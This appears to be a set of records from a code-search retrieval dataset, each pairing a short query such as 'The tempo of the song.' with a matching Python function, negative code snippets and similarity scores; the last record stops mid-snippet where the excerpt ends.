[ "0.75155187", "0.7069215", "0.7048573", "0.67138267", "0.6654528", "0.6436224", "0.64141214", "0.6291772", "0.62115586", "0.5974821", "0.58186597", "0.58115596", "0.5777675", "0.5759348", "0.57558227", "0.574919", "0.5748142", "0.5734577", "0.5732519", "0.57291174", "0.5689746", "0.56616294", "0.56616294", "0.5617734", "0.5523439", "0.55169594", "0.55166966", "0.5494595", "0.549027", "0.54690593" ]
0.77099824
0
The key signature of the song.
def key_signature(self): text = self._get_menu_item_text('Edit->Key Signature') return re.search(r'\[([A-G].?)\]$', text).group(1)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _build_signature(self):\n sig_contents = \\\n self.payload + \".\" + \\\n b64encode(b\"application/xml\").decode(\"ascii\") + \".\" + \\\n b64encode(b\"base64url\").decode(\"ascii\") + \".\" + \\\n b64encode(b\"RSA-SHA256\").decode(\"ascii\")\n sig_hash = SHA256.new(sig_contents.encode(\"ascii\"))\n cipher = PKCS1_v1_5.new(self.private_key)\n sig = urlsafe_b64encode(cipher.sign(sig_hash))\n key_id = urlsafe_b64encode(bytes(self.author_handle, encoding=\"utf-8\"))\n return sig, key_id", "def signature(self):\n return self._signature", "def signature(self):\n return self._signature", "def signature(self):\n return self._signature", "def raw_key(self) -> bytes:\n return bytes(self.data_bytes[ProofPath._Positions.KEY_POS : ProofPath._Positions.KEY_POS + KEY_SIZE])", "def raw(self) -> bytes:\n return bytes(self._signing_key)", "def public_key(self):", "def signature(self) -> str:\n return self[\"Sns\"][\"Signature\"]", "def public_key(self):\n keyfile = self._get_field('System', 'keyfile')\n return join(self.key_path, keyfile)", "def key(self):\n return self._key.decode('utf-8')", "async def server_public_key(self) -> bytes:\n raise NotImplementedError", "def _get_key(self):\n if not self.session:\n key = self.key\n else:\n key = self.session.get(\"_signature_key\")\n if key is None:\n key = str(uuid.uuid1())\n self.session[\"_signature_key\"] = key\n return key", "def signature(self) -> object:\n return self._signature", "def signature(self) -> object:\n return self._signature", "def public_signing_key(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"public_signing_key\")", "def signature_version(self) -> str:\n return self[\"Sns\"][\"SignatureVersion\"]", "def key_for_signature(self, data, sig):\n verification = self.verify(data, sig)\n return PublicKey.objects.filter(\n fingerprint=verification.fingerprint,\n profile__verified=True,\n ).first()", "def signature(self) -> Signature:\n return self._solders.signatures[0]", "def signature(self, params):\n string = ''.join(key + params[key] for key in sorted(params.keys()))\n return md5(string + self.cfg('secret'))", "async def client_public_key(self) -> bytes:\n raise NotImplementedError", "def fingerprint(self):\n return self.gpg.list_keys()[0]['fingerprint']", "def private_key():\n return \"Toholampi summer festival 2017 has the most harcore rock bands\"", "def private_key(self):", "def RSA_SIGNATURE_HASH() :\n return \"SHA-256\"", "def calculate_key_signature(public_key: str) -> str:\n rsa_obj = RSA.import_key(public_key)\n rsa_der = rsa_obj.export_key(\"DER\")\n\n hasher = SHA1.new()\n hasher.update(rsa_der)\n fingerprint = base64url_encode(hasher.digest())\n\n return fingerprint.decode(\"utf8\")", "def public_key(self): # pragma: no cover\n raise NotImplementedError()", "def sign(self):\n private_key = serialization.load_pem_private_key(\n binascii.unhexlify(self.sender_private_key.encode('utf8')),\n password=None,\n backend=default_backend()\n )\n signature = private_key.sign(\n str(self.to_dict()).encode('utf8'),\n padding.PSS(\n mgf=padding.MGF1(hashes.SHA256()),\n salt_length=padding.PSS.MAX_LENGTH\n ),\n hashes.SHA256()\n )\n\n return signature", "def verkey(self) -> str:\n\n return self._verkey", "def get_public_key(self):\n return self.private_key.get_verifying_key()", "def Sign(self):\n return self.hmac.digest()" ]
[ "0.69159144", "0.68707407", "0.68707407", "0.68707407", "0.6732909", "0.658839", "0.65777826", "0.6566842", "0.6536141", "0.6520834", "0.64927524", "0.6490056", "0.6486773", "0.6486773", "0.64298445", "0.64217603", "0.6413349", "0.63893026", "0.63876134", "0.6386294", "0.6298452", "0.6245364", "0.6212571", "0.61962026", "0.61852556", "0.6143322", "0.61065423", "0.6104973", "0.6103501", "0.6080038" ]
0.7109579
0
The time signature (meter) of the song.
def time_signature(self): text = self._get_menu_item_text('Edit->Meter (Time Signature)') return re.search(r'\[([0-9]+/[0-9]+)\]$', text).group(1)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_signingTime(self):\n\n return self.get_POW().signingTime()", "def time(self) -> int:\n return self.raw[\"time\"]", "def getTime(self) -> float:\n return self.t", "def getTime(self):\n return _osgAnimation.Keyframe_getTime(self)", "def get_time(self) -> float:\n raise NotImplementedError()", "def timeTime(self):\n return self._micros / 1000000.0", "def time(self) -> float:\n return self._time", "def atime(self):\n return safeInt(self.tag(\"atime\"))", "def time(self):\n return signal_base_get_time(self.obj)", "def get_snapshot_time(self) -> float:\n return self._snapshot_time", "def tic(self):\n return self._timestamp", "def time(self):\n\t\treturn self._time", "def time(self):\n try:\n if self.single_date:\n return self.stime\n else:\n return self.stime + (self.etime - self.stime) / 2\n except TypeError:\n return None", "def calculate_timestamp(self):\n return ((self.calculate_record_number() - 1) * SAMPLE_RATE) + \\\n self.time_on", "def getTimestamp(self):\r\n\t\treturn self.pair.data['timestamp']", "def start_time(self):\n return RPR.GetAudioAccessorStartTime(self.id)", "def getTime(self):\n return _osgAnimation.Motion_getTime(self)", "def time(self) -> float:\n return self.sim_scene.data.time", "def get_stamp(self):\n return self.timestamp", "def time(self):\n # type: () -> int\n return self._time", "def tt(self):\n return self.MJD + self.tt_ut1 + 2400000.5", "def get_time(self):\n return self.get_timed() / 10.0", "def microsecond(self):\n return self._microsecond", "def timestamp(self) -> int:\r\n\r\n return self.__timestamp", "def getTime(self):\n return self.step / (self.max_step + int(self.include))", "def time(self):\n return self.raw[\"logTime\"]", "def time(self):\n return self._time", "def ms(self):\n\t\treturn self._ms", "def timestamp(self):\n return time.time()", "def timestamp(self):\n return self.__timestamp" ]
[ "0.6606404", "0.64903015", "0.64892113", "0.6447548", "0.64385873", "0.633328", "0.6330664", "0.627636", "0.6260411", "0.6224092", "0.6214561", "0.6208507", "0.62078905", "0.6193222", "0.6189002", "0.61833715", "0.61824566", "0.6165584", "0.6165227", "0.6151058", "0.6149589", "0.6149008", "0.6137132", "0.61282855", "0.61210155", "0.6115817", "0.611559", "0.6112285", "0.611132", "0.61090255" ]
0.7741977
0
The tempo of the song.
def tempo(self): text = self._get_menu_item_text('Edit->Tempo') return float(re.search(r'\[([0-9.,]+)\]$', text).group(1))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_tempo(self, tempo):\n self._tempo = tempo", "def tempo(signal,fs,hop_len = 64, **kwargs):\n tempo, beats = librosa.beat.beat_track(y=signal, sr=fs, hop_length=hop_len)\n return tempo", "def analyze_tempo(self, sample):\n # get beat from sample\n is_beat = self.tempo_analyzer(sample)\n\n # if has a beat\n if is_beat:\n this_beat = self.tempo_analyzer.get_last_s()\n\n # add beat to list of beats\n self.beats.append(this_beat)\n\n # if have at least 4 beats, analyze\n if len(self.beats) > 4:\n # analyze tempo\n self.curr_tempo = int(beats_to_bpm(self.beats))\n\n # remove beats that were analyzed\n del self.beats[0]\n\n # return bpm\n return self.curr_tempo\n # if not enough beats to analyze, return last known value\n return self.curr_tempo", "def tempo_gen(tempo=120, srate=None):\n dt = tempo / (60 * get_srate(srate))\n return (i * dt for i in count())", "def tempo(beats, trk=None, bt=480):\n if not trk:\n trk = MidiTrack()\n trk.name = \"Tempo variation\"\n trk.append(MetaMessage(\"set_tempo\",\n tempo=beats[0],\n time=0))\n\n for i, beat in enumerate(beats):\n trk.append(MetaMessage(\"set_tempo\",\n time=bt,\n tempo=beat))\n\n return trk", "def get_time(self) -> float:\n # if the controller is playing we must play the music if paused\n if self.controller.playing and self.music.paused:\n self.music.set_time(self.controller.time)\n self.music.start()\n return self.controller.time\n\n # If the controller is not playing and music is not paused, we need to pause music\n if not self.controller.playing and not self.music.paused:\n self.music.pause()\n self.music.set_time(self.controller.time)\n return self.controller.time\n\n rt = super().get_time()\n t = self.music.get_time()\n\n if abs(rt - t) > 0.1:\n # print(\"Music out of sync!!!\", t, rt)\n self.music.set_time(rt)\n return rt\n\n return t", "def get_tone_frequency(self):\n return self.tone_frequency", "def fetch_item_tempo(lib, loglevel, item, write):\n # Skip if the item already has the tempo field.\n if item.bpm:\n log.log(loglevel, u'bpm already present: %s - %s - %s' %\n (item.artist, item.title, item.bpm))\n return\n\n\n # Return generated tempo.\n tempo = get_file_bpm(item.path)\n if not tempo:\n log.log(loglevel, u'tempo not generated: %s - %s' %\n (item.artist, item.title),test)\n return\n\n log.log(loglevel, ui.colorize('text_success', 'Generated tempo :') + u' %s - %s' %\n (item.artist, item.title))\n# log.log(loglevel, ui.colorize('text_success', 'GENERATED:')) + log.log(loglevel, u'generated tempo: %s - %s' %\n# (item.artist, item.title))\n\n# log.log(loglevel, ui.colorize('text_success', 'GENERATED:'))\n# log.log(loglevel, u'generated tempo: %s - %s' %\n# (item.artist, item.title))\n item.bpm = int(tempo)\n if write:\n item.try_write()\n item.store()", "def track_duration(self):\n return self._track_duration", "def cur_song(self):\n if self._cur_song is None:\n self.restart()\n return self._cur_song", "def media_position(self):\n return (\n self._table.active_track_total_time\n - self._table.active_track_remaining_time\n ).total_seconds()", "def duration(self):\n with audioread.audio_open(self.path) as f:\n return f.duration", "def duration_in_seconds(self):\n \"Should not set track length\"\n return self.duration / float(self.samplerate)", "def get_tempo(track_id: str) -> float:\n token = _get_token()\n headers = dict(Authorization=f'Bearer {token}')\n endpoint = f'https://api.spotify.com/v1/audio-features/{track_id}'\n response = requests.get(endpoint, headers=headers)\n if response.status_code == 200:\n return response.json().get('tempo')\n else:\n raise SpotifyAPIError(response.json())", "def tic(self):\n return self._timestamp", "def tempo_r(mid, beats, rs):\n bt = mid.ticks_per_beat\n trk = MidiTrack()\n trk.name = \"Tempo variation\"\n trk.append(MetaMessage(\"set_tempo\",\n tempo=beats[0],\n time=0))\n\n for i, beat in enumerate(beats):\n r = rs[i]\n if r == 0: # For the deterministic case\n tempo_r = beat\n else:\n tempo_r = rd.randint(beat-int(beat*r), beat + int(beat*r)) + 1\n trk.append(MetaMessage(\"set_tempo\",\n time=bt,\n tempo=tempo_r))\n\n mid.tracks.append(trk)\n return mid", "def ms(self):\n # my clock uses seconds internally\n return 1000 * self.read()", "def getTempo():\r\n global dauer\r\n \r\n dauer = 0.0\r\n counter = 1\r\n\r\n for x in midi_data.get_tempo_changes(): #pretty_midi saves the tempo of a midi-file in nested-arrays, therefore a few for-loops and if statements are necessary\r\n for e in x:\r\n if e > 0:\r\n if counter > 0:\r\n tempi.append(round(e))\r\n counter = 0\r\n break\r\n \r\n dauer = 60000/(e/4)", "def to_music21_metronome(tempo: Tempo) -> MetronomeMark:\n metronome = MetronomeMark(number=tempo.qpm)\n metronome.offset = tempo.time\n return metronome", "def getTime(self) -> float:\n return self.t", "def get_sound_speed(self):\n return calculate_speed_of_sound(self.T, self.H, self.p)", "def get_next_song(self):\r\n if self.timestamp:\r\n delta = datetime.datetime.now() - self.timestamp\r\n if delta < timedelta(seconds=3):\r\n self.log.warning(u\"Song '%s' stopped playing after less than 3 seconds for some reason!\" % self.meta)\r\n time.sleep(3)\r\n self.timestamp = datetime.datetime.now()\r\n\r\n song = self.findQueued()\r\n\r\n self.meta = u\"%s - %s\" % (song.artist(), song.title)\r\n self.log.debug(\"Now playing \\\"%s\\\" [ID %s]\" % (song.title, song.id))\r\n self.song = song\r\n\r\n try:\r\n filepath = song.file.path.encode(self.fsenc)\r\n except:\r\n try:\r\n filepath = song.file.path.encode(self.sysenc)\r\n except:\r\n filepath = song.file.path\r\n self.log.debug(\"Returning path %s\" % filepath)\r\n return filepath", "def media_duration(self):\n return self._table.active_track_total_time.total_seconds()", "def set_time(self, value: float):\n super().set_time(value)\n self.music.set_time(value)", "def _duration(self):\n if getattr(self, '_duration_cache', None):\n return self._duration_cache\n duration = extractMetadata(guessParser(\\\n InputIOStream(self))).get('duration')\n if not duration:\n raise Exception(u'Not an audio file')\n else:\n duration = duration.seconds\n self._duration_cache = duration\n return duration", "def duration(self):\r\n\t\treturn (self.globEnd - self.globStart)", "def get_current_play_time(self):\n return self.get(COMMAND_UIC, 'GetCurrentPlayTime')", "def get_time(self) -> float:\n return self.player.time", "def media_track(self):\n return self.coordinator.data.nowplaying[self.zone.SourceID].QueueSongIndex", "def tt(self):\n return self.MJD + self.tt_ut1 + 2400000.5" ]
[ "0.69736135", "0.6595954", "0.6365309", "0.6310555", "0.61785966", "0.61531806", "0.6058358", "0.576273", "0.57180995", "0.57065964", "0.5647518", "0.56118566", "0.56033045", "0.5536001", "0.5516438", "0.5497539", "0.5480728", "0.5466305", "0.5449493", "0.5441588", "0.54408973", "0.5435366", "0.5428752", "0.54123014", "0.5404277", "0.537793", "0.5374817", "0.53700966", "0.53468347", "0.5343705" ]
0.6787653
1
Formats the DF and adds missing columns
def add_missing_columns(df, columns): df_columns = list(df.columns) table_columns = columns col_not_in_df = set(table_columns) - set(df_columns) # print(f' missing columns from df : {col_not_in_df}') for col in col_not_in_df: df[col] = '' df = df[table_columns] # print(f' added missing columns to df') # print(f' final df col length : {len(df.columns)}') return df
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def add_missing_fields(df, inventory_acronym, f, maintain_columns=False):\n # Rename for legacy datasets\n if 'ReliabilityScore' in df:\n df = df.rename(columns={'ReliabilityScore': 'DataReliability'})\n # Add in units and compartment if not present\n if 'Unit' in f.fields() and 'Unit' not in df:\n df['Unit'] = 'kg'\n if 'Compartment' in f.fields() and 'Compartment' not in df:\n try:\n compartment = inventory_single_compartments[inventory_acronym]\n except KeyError:\n log.warning('no compartment found in inventory')\n compartment = ''\n df['Compartment'] = compartment\n for field in f.fields():\n if field not in df:\n df[field] = None\n # Resort\n col_list = f.fields()\n if maintain_columns:\n col_list = col_list + [c for c in df if c not in f.fields()]\n df = df[col_list].reset_index(drop=True)\n return df", "def complete_columns(training_df, valid_df):\n for c in valid_df.columns:\n if c not in training_df.columns:\n training_df[c] = 0\n for c in training_df.columns:\n if c not in valid_df.columns:\n valid_df[c] = 0\n return training_df, valid_df", "def fix_data(self, df):\n return df.dropna(axis='columns', how='all').fillna(0.0)", "def add_cols_to_cleaned_df(df):\n\n core_cols = ['time','lat','lon','depth','year','month','week','dayofyear','float_id','cycle']\n template_cols = core_cols + bgc_data_columns\n template_df = pd.DataFrame(columns=template_cols)\n df = template_df.append(df)[template_cols]\n return df", "def fill_mising(self, dict):\t\n\t\tfor name, df in dict.items():\n\t\t\tdf = df.fillna(method='pad')\n\t\t\tdict[name] = df\n\t\treturn dict", "def augment_dataframe(self, df: pd.DataFrame) -> pd.DataFrame:", "def fill_missing(self):\n df = self.df\n # Filling with default values\n logger.debug(\"Filling from distributions...\")\n for field in HeatStrokeDataFiller.default_map or field in HeatStrokeDataFiller.positive_default:\n if field not in df.columns:\n logger.warning(\"(%s) missing from data-frame columns\" % field)\n continue\n logger.debug(\"Setting missing in \\\"%s\\\" to default: %s\" % (field, HeatStrokeDataFiller.default_map[field]))\n default_value = HeatStrokeDataFiller.default_map[field]\n\n where = HeatStrokeDataFiller.find_where_missing(df, field, find_nan=True, find_str=False)\n how_many_to_fill = np.sum(where)\n if field in HeatStrokeDataFiller.positive_default:\n # Use default positive dietributions\n distribution = HeatStrokeDataFiller.positive_default[field]\n df[field].loc[where] = distribution(how_many_to_fill)\n else:\n logger.debug(\"Using default %s for field: %s\" % (default_value, field))\n # Use default values\n df[field].loc[where] = np.array([default_value] * how_many_to_fill)\n\n # Filling with Zeros\n logger.debug(\"Fillling with zeros...\")\n for field in HeatStrokeDataFiller.fields_to_fill_with_zero:\n if field not in df.columns:\n logger.warning(\"\\\"%s\\\" missing from columns\" % field)\n continue\n logger.debug(\"Setting missing in \\\"%s\\\" to 0\" % field)\n\n where = HeatStrokeDataFiller.find_where_missing(df, field, find_nan=True, find_str=True)\n how_many_to_fill = np.sum(where)\n df[field].loc[where] = np.zeros(how_many_to_fill)\n\n # Filling in columns with the average from the rest of the column\n logger.debug(\"Filling with agerages...\")\n for field in HeatStrokeDataFiller.fields_to_fill_with_average:\n if field not in df.columns:\n logger.warning(\"\\\"%s\\\" missing from data-frame columns\" % field)\n continue\n\n where = HeatStrokeDataFiller.find_where_missing(df, field, find_nan=True, find_str=True)\n data = df[field][np.invert(where)]\n mean = np.mean(data)\n std = np.std(data)\n if mean == np.nan or std == np.nan:\n mean, std = (0, 0)\n logger.debug(\"Setting missing in \\\"%s\\\" with: %.3f +/- %.3f\" % (field, mean, std))\n how_many_to_fill = np.sum(where)\n df[field].loc[where] = mean + std * np.random.random(how_many_to_fill)\n\n fields_not_modified = set(df.columns) - set(HeatStrokeDataFiller.default_map.keys()) - HeatStrokeDataFiller.fields_to_fill_with_zero - HeatStrokeDataFiller.fields_to_fill_with_zero\n logger.debug(\"Fields not modified: %s\" % fields_not_modified.__str__())\n return df", "def cols_missing_pect(self, df, first_index):\n cols = Config.FEATURE_DEFINITION['integer_cols'] + \\\n Config.FEATURE_DEFINITION['float_cols'] + \\\n Config.FEATURE_DEFINITION['category_cols']\n missing_df = pd.DataFrame(columns=cols)\n\n for building, data in df.groupby('series_id'):\n fig, ax = plt.subplots(figsize=(7,5))\n data = data[cols + ['timestamp']]\n min_date = data[first_index].first_valid_index()\n if min_date:\n data = data[data.index >= min_date]\n data = data.reset_index(drop=True).resample('M', on='timestamp').first().drop(columns=[\"timestamp\"])\n string_missing_df = (data.isnull().sum() * 100 / len(data))\n string_missing_df['series_id'] = building\n missing_df = missing_df.append(string_missing_df, ignore_index=True)\n missing_df = missing_df.set_index('series_id')\n \n return missing_df", "def clean(dataframe):\n # replace 'unknown' in Pop. density with np.nan\n dataframe = dataframe.replace('unknown', np.nan)\n\n # remove spaces from column names and content\n dataframe.columns = dataframe.columns.str.strip()\n\n # change YYYYMMDD to days of the year\n date_debug = []\n for i in range(1, 366):\n date_debug.append(i)\n\n dataframe2 = {'YYYYMMDD': date_debug}\n dataframe['YYYYMMDD'] = dataframe2['YYYYMMDD']\n\n return dataframe", "def clean_columns(df: pd.DataFrame, filled_rate: float = 0.6) -> pd.DataFrame:\n\n print(f\"Initial shape of the dataframe: {str(df.shape) : >17}\")\n # keep columns that are filled more than the filled rate, default = 60%\n df = df.loc[:, (df.isnull().mean() < (1 - filled_rate))]\n print(f\"Shape after removing null columns: {str(df.shape) : >14}\")\n\n return df", "def get_df(self,**kwargs):\n df = super().get_df(**kwargs)\n if self.automatically_fill_missing_columns == True:\n if df['year_of_birth'].isnull().all():\n df['year_of_birth'] = self.tools.get_year(df['birth_datetime'])\n\n if df['month_of_birth'].isnull().all():\n df['month_of_birth'] = self.tools.get_month(df['birth_datetime'])\n\n if df['day_of_birth'].isnull().all():\n df['day_of_birth'] = self.tools.get_day(df['birth_datetime'])\n \n return df", "def _add_fips_if_missing(df: pd.DataFrame):\n if CommonFields.FIPS not in df.columns:\n df[CommonFields.FIPS] = df[CommonFields.LOCATION_ID].apply(pipeline.location_id_to_fips)", "def check_dataframe_columns(df):\r\n if len(set(df.columns).intersection(\r\n set([constants.CASE_CONCEPT_NAME, xes_constants.DEFAULT_NAME_KEY,\r\n xes_constants.DEFAULT_TIMESTAMP_KEY]))) < 3:\r\n raise Exception(\r\n \"please format your dataframe accordingly! df = pm4py.format_dataframe(df, case_id='<name of the case ID column>', activity_key='<name of the activity column>', timestamp_key='<name of the timestamp column>')\")", "def clean(df):", "def handle_missing_data(self, dataframe):\n return dataframe", "def update_column_format(self):\n pass", "def prepare_input_df(df: DataFrame) -> DataFrame:\r\n df = df.fillna('') # Fill np.nan values with blanks (\"\").\r\n df = to_upper(df) # Force case to UPPER for all columns.\r\n df = strip_columns(df) # Remove trailing whitespace.\r\n return df", "def format_dataframe(dat_file,column_names,index):\n df = pd.read_csv(dat_file,sep='\\s+',names=column_names)\n df = df.iloc[1:]\n df = df.drop(columns='id')\n df = df.set_index(index)\n return df", "def fill_missing(self) -> None:\n\n self.fill_missing_rows()\n self.fill_missing_source_parameters()\n return", "def _make_blank(cls) -> pd.DataFrame:\n spec = list(zip(cls._required_columns, cls._required_dtypes))\n try:\n arr = np.zeros(0, dtype=spec)\n return pd.DataFrame(arr)\n except TypeError as exc:\n raise TypeError(r\"{exc}: {spec}\") from exc", "def __clean_df(self):\n self.__convert_min()", "def finalize_dataframe(self, dataframe: DataFrame):\n # Drop duplicates (some geospatial datasets, like ZCTAs, include redundant rows)\n geo_names = {'geometry'}\n non_geo_names = set(dataframe.columns) - geo_names\n dataframe = dataframe.drop_duplicates(subset=non_geo_names, ignore_index=True)\n\n # Insert NAs for annotated row values to avoid outlier values like -999,999,999\n dataframe.loc[dataframe['annotation'].notnull(), 'value'] = ''\n dataframe['value'] = pd.to_numeric(dataframe['value'], errors='coerce')\n\n # Create year date column\n dataframe['date'] = pd.to_datetime(\n dataframe['year'].astype('string') + '-12-31', format='%Y-%m-%d'\n )\n\n # Rename and reorder columns\n names_csv = resource_string(__name__, 'resources/names.csv')\n csv_reader = reader(StringIO(names_csv.decode('utf-8')))\n next(csv_reader) # Skip header row\n names = dict(csv_reader) # type: ignore\n if self.geometry in ['points', 'polygons'] and (set(dataframe.columns) & geo_names):\n name_order = [*names.values(), *geo_names]\n else:\n name_order = list(names.values())\n dataframe = dataframe.rename(columns=names)[name_order]\n\n return dataframe", "def clean_store_csv(df: pd.DataFrame) -> pd.DataFrame:\n cols = map(convert_to_snake_case, df.columns)\n df.columns = cols\n\n for col in ['promo2_since_week', 'promo2_since_year',\n 'competition_distance', 'competition_open_since_month',\n 'competition_open_since_year']:\n df[col] = df[col].fillna(df[col].mean())\n\n df['promo_interval'] = df.promo_interval.fillna('None')\n return df", "def fill_features(df, features):\n existing = df.columns\n\n # Drop untrained features\n for feat in existing:\n if feat not in features:\n df.drop(feat, axis=1, inplace=True)\n\n # Add missing features\n for feat in features:\n if feat not in existing:\n df[feat] = 0\n\n # Return with column selection for ordering\n return df[features]", "def _add_missing_cols(user_list, fields=None):\n new_list = []\n required_cols = ['type', 'id', 'view_href', 'login']\n\n # Add any defined fields to the list of required columns\n if fields and fields != '*':\n parsed_fields = fields.split(',')\n for field in parsed_fields:\n if field not in required_cols:\n required_cols.append(field)\n\n # Loop through the messages and add any missing columns\n for user in user_list:\n for col in required_cols:\n if col not in user:\n user[col] = ''\n new_list.append(user)\n return new_list", "def CleanUp(self):\n blankColumnPattern = re.compile('^-*$')\n blankColumns = []\n for columnIndex in range(self.alignment.get_alignment_length() - 1):\n columnValues = self.alignment[:,columnIndex]\n match = blankColumnPattern.search(columnValues)\n if (match):\n blankColumns.append(str(columnIndex))\n for column in blankColumns[::-1]:\n self.DeleteRange(',' + str(column), True)\n self.Show(self.displayedColumn)\n self.BackupAlignment()", "def _dataframe_preprocess(self):\n # 1. add baisc feature like date, time in day, ....\n if self.data_type != 'porto':\n self.df['TIMESTAMP'] = self.df.apply(lambda df: df['TIMESTAMPS'][0], axis=1)\n self.df['TIME'] = pd.to_datetime(self.df['TIMESTAMP'], unit='s', utc=True)\n \n self.df.TIME = self.df.TIME.dt.tz_convert(self.timezone)\n # 2. group df for specific driver analysis\n self.grouped_df = self.df.groupby('LABEL')\n if self.count_od_info:\n if 'SD' not in self.df.columns:\n self._add_OD_info()\n self.grouped_od = self.df.groupby('SD')", "def format_df(df):\n df = df.transpose()\n df.rename(columns=df.iloc[0], inplace=True)\n df.drop('gene', inplace=True)\n df.index.rename('sample_id', inplace=True)\n return df", "def format_df(df):\n df = df.transpose()\n df.rename(columns=df.iloc[0], inplace=True)\n df.drop('gene', inplace=True)\n df.index.rename('sample_id', inplace=True)\n return df", "def combine_columns(allowed_columns):\n\n v_columns = [v for v in allowed_columns if v in df.columns]\n v_columns.sort()\n for i in range(1, len(v_columns)):\n df[v_columns[0]] = df[v_columns[0]].fillna(df[v_columns[i]])\n df.drop(v_columns[i], 1, inplace=True)\n return v_columns[0]" ]
[ "0.641115", "0.6301545", "0.6252176", "0.6246336", "0.621779", "0.6163167", "0.61629313", "0.61473024", "0.6107609", "0.6089415", "0.6087212", "0.60132515", "0.6011982", "0.59927666", "0.59733063", "0.5875654", "0.58720547", "0.5864852", "0.5810072", "0.5796086", "0.578949", "0.5781051", "0.5777082", "0.5765621", "0.5760843", "0.5760247", "0.575826", "0.5735501", "0.5735501", "0.570075" ]
0.6645317
0
Update ArcGIS R bindings on this machine.
def update_package(r_library_path=r_library_path): # TODO make sure that the package isn't loaded before updating? info = arcpy.GetInstallInfo() arc_version = info['Version'] product = info['ProductName'] if arc_version in ('10.1', '10.2', '10.3.0') and product == 'Desktop': arcpy.AddError("The ArcGIS R bridge requires ArcGIS 10.3.1 or later.") sys.exit() if arc_version in ('1.0', '1.0.2') and product == 'ArcGISPro': arcpy.AddError("The ArcGIS R bridge requires ArcGIS Pro 1.1 or later.") sys.exit() # TODO also check for the 10.3.1 package version in case of copy-only? if r_pkg_version() is None: arcpy.AddWarning( "Package is not installed. First use the \"Install R bindings\" script.") else: if compare_release_versions(): arcpy.AddMessage("New release detected! Installing.") install_package(overwrite=True, r_library_path=r_library_path) else: msg = "The installed ArcGIS R package (version " + \ "{}) is the current version on GitHub.".format(r_pkg_version()) arcpy.AddMessage(msg)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def refresh_script_provider(self):\n if qgis_version() < 21600:\n from processing.core.Processing import Processing\n Processing.updateAlgsList()\n else:\n from processing.core.alglist import algList\n algList.reloadProvider('script')", "def refresh(self):\n self.update_from_file()\n self.update_from_env()", "def update_runtime_variables(self) -> None:\n\n self.update_defines()\n self.update_includes()\n self.update_modules()", "def update_requirements():\n\n require('code_root', provided_by=env.environments)\n requirements = os.path.join(env.code_root, 'requirements')\n sdists = os.path.join(requirements, 'sdists')\n base_cmd = ['pip install']\n base_cmd += ['-q -E %(virtualenv_root)s' % env]\n base_cmd += ['--no-index --find-links=file://%s' % sdists]\n # install GDAL by hand, before anything else that might depend on it\n cmd = base_cmd + ['--no-install \"GDAL==1.6.1\"']\n sudo(' '.join(cmd), user=env.deploy_user)\n # this directory won't exist if GDAL was already installed\n if files.exists('%(virtualenv_root)s/build/GDAL' % env):\n sudo('rm -f %(virtualenv_root)s/build/GDAL/setup.cfg' % env, user=env.deploy_user)\n with cd('%(virtualenv_root)s/build/GDAL' % env):\n sudo('%(virtualenv_root)s/bin/python setup.py build_ext '\n '--gdal-config=gdal-config '\n '--library-dirs=/usr/lib '\n '--libraries=gdal1.6.0 '\n '--include-dirs=/usr/include/gdal '\n 'install' % env, user=env.deploy_user)\n # force reinstallation of OpenBlock every time\n with settings(warn_only=True):\n sudo('pip uninstall -y -E %(virtualenv_root)s ebpub ebdata obadmin' % env)\n for file_name in ['ebpub.txt', 'ebdata.txt', 'obadmin.txt', 'openrural.txt']:\n apps = os.path.join(requirements, file_name)\n cmd = base_cmd + ['--requirement %s' % apps]\n sudo(' '.join(cmd), user=env.deploy_user)", "def pipupdate():\n\n packages = [d for d in pkg_resources.working_set]\n subprocess.call('pip install --upgrade ' + ' '.join(packages))", "def UpdateAccessBindings(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def _fcn_link_roi(self):\n kwargs = self.cbqt.cbobjs._objs['roi'].to_kwargs(True)\n self.roi.update_from_dict(kwargs)\n self.roi._update_cbar()", "def update_angles(self):\n joint_values = []\n for i in self.joint_names:\n joint_values.append(self.joint_angles[i])\n \n try:\n answer = self.update_arm_angles(joint_values)\n except rospy.ServiceException as e:\n rospy.logwarn('Service call failed for: {0}'.format(e))\n\n #service_call = # self.update_joints(joint_values)", "def port_update(self, context, **kwargs):\n self._refresh_bridge_mappings_to_neutron()", "def update_geometries(self, geo_nodes, attribute_data, alembic_path):\n mc.delete([\n mc.listRelatives(node, parent=True)[0]\n for node in geo_nodes\n ])\n geo_nodes = self.import_alembic(alembic_path)\n self.set_alembic_effect_attributes(geo_nodes, attribute_data)", "def update_radius(DirectoryId=None, RadiusSettings=None):\n pass", "def connect_rig():\n\n # Connect hooks to parent\n connect_hooks()\n\n # Create spaces\n create_spaces()\n\n # Loack and load attrs values and keyable settings\n '''\n # Done\n if mc.objExists('visibility_CTL'):\n mc.setAttr('visibility_CTL.allCtrlsVis', 1)\n mc.setAttr('visibility_CTL.offsetCtrlsVis', 0)\n mc.setAttr('visibility_CTL.jointsSelectable', 0)\n mc.setAttr('visibility_CTL.modelSelectable', 0)\n mc.setAttr('visibility_CTL.jointsVis', 0)\n mc.setAttr('visibility_CTL.modelVis', 1)\n '''\n\n mc.select(cl=1)\n print '\\nFinalized rig.'", "def update(self):\n self.backbone_module.update()\n mx.nd.waitall()", "def refresh():\n return __apf_cmd(\"-e\")", "def update(self, system, environment_input):\n pass", "def syncrepl_refreshdone(self):\n pass", "def upgrade_packages():\n\n require('environment', provided_by=env.environments)\n system.update_apt_sources()\n system.upgrade_apt_packages()", "def update_versions(self, reference_resolution):\n raise NotImplementedError(\"update_versions is not implemented\")", "def _update_binding_after_export(self, map_record, sync_data=None, compare_data=None):\n self.binder.bind(self.getresponse_id, self.binding_id,\n sync_data=sync_data, compare_data=compare_data)", "def test_ipam_rirs_update(self):\n pass", "def snap_refresh(packages, *flags):\n if type(packages) is not list:\n packages = [packages]\n\n flags = list(flags)\n\n message = 'Refreshing snap(s) \"%s\"' % ', '.join(packages)\n if flags:\n message += ' with options \"%s\"' % ', '.join(flags)\n\n log(message, 